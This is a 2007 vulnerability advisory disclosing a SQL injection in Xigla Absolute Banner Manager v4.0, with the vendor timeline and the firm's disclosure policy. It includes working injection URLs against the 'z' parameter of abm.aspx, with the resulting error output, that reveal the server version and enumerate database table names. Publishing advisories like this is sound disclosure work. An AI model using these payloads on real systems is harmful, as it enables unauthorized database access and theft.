xigla-sql.txt
Posted on 08 December 2007
HackerSafe Labs - Security Advisory http://www.hackersafelabs.com/ <http://www.hackersafelabs.com/> Date: 12/06/2007 Vendor: http://www.xigla.com <http://www.xigla.com> Package: Xigla Absolute Banner Manager Versions: v4.0 Credit: Joseph Pierini - HackerSafe Labs Risk: Related Exploit Range: Remote Attack Complexity: Medium Level of Authentication Needed: Not Required Confidentiality Impact: Major Integrity Impact: Major Availability Impact: Major Overview: Absolute Banner Manager .NET is a feature packed Ad Tracking and Banner Management software specially developed for the webmaster looking for a scalable, flexible and reliable Banner Ad Serving front-end tool. Vulnerabilities: A SQL injection exists in the Windows version of the Xigla Absolute Banner Manager application. SQL Injection Page: "abm.aspx" SQL Injection Parameter: "z=" Examples: http://www.domainname.com/absolutebm/abm.aspx?z=@@version <http://www.domainname.com/absolutebm/abm.aspx?z=@@version> Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int. http://www.domainname.com/absolutebm/abm.aspx?z=1))%20and%201=convert(in t,(select%20top%201%20%20convert(varchar,name)%20from%20sysobjects%20whe re%20xtype=char(85))) <http://www.domainname.com/absolutebm/abm.aspx?z=1))%20and%201=convert(i nt,(select%20top%201%20%20convert(varchar,name)%20from%20sysobjects%20wh ere%20xtype=char(85)))> - Syntax error converting the varchar value 'dtproperties' to a column of data type int. Resolution Timeline: Vendor Notification: October 29, 2007 : 'info@xigla.com' 'security@xigla.com' Vendor Response: None Vendor Fix: None Public release of advisory: December 6, 2007 ScanAlert Responsible Disclosure Policy ScanAlert believes in the responsible disclosure of vulnerability information with a coordinated release with the vendor where possible. Except where active and/or trivial exploitation of the vulnerability is present, ScanAlert believes it is in the best interest of the community when the vendor participates in the process of disclosure and has sufficient time to respond effectively. If ScanAlert exhausts all reasonable means in order to contact a vendor, then ScanAlert may issue a public advisory disclosing its findings 15 business days after the initial contact. ScanAlert's mission is to make the web safe from hackers. We make web sites secure from hackers and certify it to their customers via our patent pending HACKER SAFE(r) security certification technology. Our daily security audits and real-time certification enables consumers to know whether the sites where they shop are taking the necessary steps to safeguard their personal information from hackers. By alleviating consumers' fears of identity theft and credit card fraud, online merchants who earn HACKER SAFE certification consistently see substantial increases in online transactions Joseph Pierini, CISSP | Director, Enterprise Services ScanAlert ( www.scanalert.com) <http://www.scanalert.com)> labs@hackersafe.com <mailto:labs@hackersafe.com> 877-302-9965 ext 1185